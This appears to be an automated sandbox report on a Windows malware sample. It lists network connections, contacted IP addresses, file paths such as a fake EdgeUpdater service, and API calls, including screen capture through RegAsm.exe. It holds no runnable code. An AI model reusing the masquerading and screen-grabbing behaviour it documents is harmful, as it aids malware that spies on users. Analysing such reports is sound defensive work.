Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901

Source: unknown	HTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.237.62.213:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.2.46:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.141:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.150:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.18:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.195.67:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.12:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.141:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.150:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.18:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.195.67:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.12:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.141:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.150:443 -> 192.168.2.4:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.18:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.195.67:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.12:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.4:49908 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 15_2_00419010 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

15_2_00419010

System Summary

.NET source code contains very large array initializations

Source: 66fbfcc301a31_swws[1].exe.5.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 314368
Source: 66fbfccd837ac_vadggdsa[1].exe.5.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 393216
Source: SYvU5mYtoLg0LBOPe0pXYHty.exe.5.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 314368

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042BF20 __aulldiv,VirtualAlloc,__aulldiv,__aulldiv,NtQuerySystemInformation,__aulldiv,WideCharToMultiByte,CharToOemA,VirtualFree,__aulldiv,	5_2_0042BF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B42F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	15_2_6B42F280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B48B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	15_2_6B48B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B48B8C0 rand_s,NtQueryVirtualMemory,	15_2_6B48B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B48B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	15_2_6B48B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B44ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	15_2_6B44ED10

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02AD0E48	0_2_02AD0E48
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 1_2_025A0E48	1_2_025A0E48
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 1_2_025A2B92	1_2_025A2B92
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 1_2_025A40BA	1_2_025A40BA
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 1_2_025A6D88	1_2_025A6D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004400A0	5_2_004400A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004960A0	5_2_004960A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004B60A0	5_2_004B60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004CE2E0	5_2_004CE2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004263E0	5_2_004263E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00480800	5_2_00480800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0046C8D0	5_2_0046C8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00450910	5_2_00450910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004309A0	5_2_004309A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00436CA0	5_2_00436CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00508D80	5_2_00508D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0049CD90	5_2_0049CD90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00432DB0	5_2_00432DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004994E0	5_2_004994E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004AF780	5_2_004AF780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042B840	5_2_0042B840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004358A0	5_2_004358A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042F900	5_2_0042F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00441AF0	5_2_00441AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00433CF0	5_2_00433CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0047DEB0	5_2_0047DEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00433F10	5_2_00433F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00402100	5_2_00402100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00422640	5_2_00422640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00440600	5_2_00440600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00402630	5_2_00402630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_005166C5	5_2_005166C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042C740	5_2_0042C740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0056274C	5_2_0056274C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_005128D0	5_2_005128D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_005168C0	5_2_005168C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004428D0	5_2_004428D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041E9E0	5_2_0041E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00424E70	5_2_00424E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042CEF0	5_2_0042CEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00542EE0	5_2_00542EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0056703D	5_2_0056703D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004210E0	5_2_004210E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004213A0	5_2_004213A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00423480	5_2_00423480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040B5E0	5_2_0040B5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00405640	5_2_00405640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0054D74A	5_2_0054D74A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00421820	5_2_00421820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00429830	5_2_00429830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00543889	5_2_00543889
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00423900	5_2_00423900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00561B30	5_2_00561B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00449D20	5_2_00449D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00401E90	5_2_00401E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00551F50	5_2_00551F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0054FF18	5_2_0054FF18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042BF20	5_2_0042BF20
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 6_2_00940E48	6_2_00940E48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B4235A0	15_2_6B4235A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B425340	15_2_6B425340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B43C370	15_2_6B43C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B46D320	15_2_6B46D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B4953C8	15_2_6B4953C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B42F380	15_2_6B42F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B469A60	15_2_6B469A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B468AC0	15_2_6B468AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B441AF0	15_2_6B441AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B46E2F0	15_2_6B46E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B49BA90	15_2_6B49BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B4222A0	15_2_6B4222A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B454AA0	15_2_6B454AA0
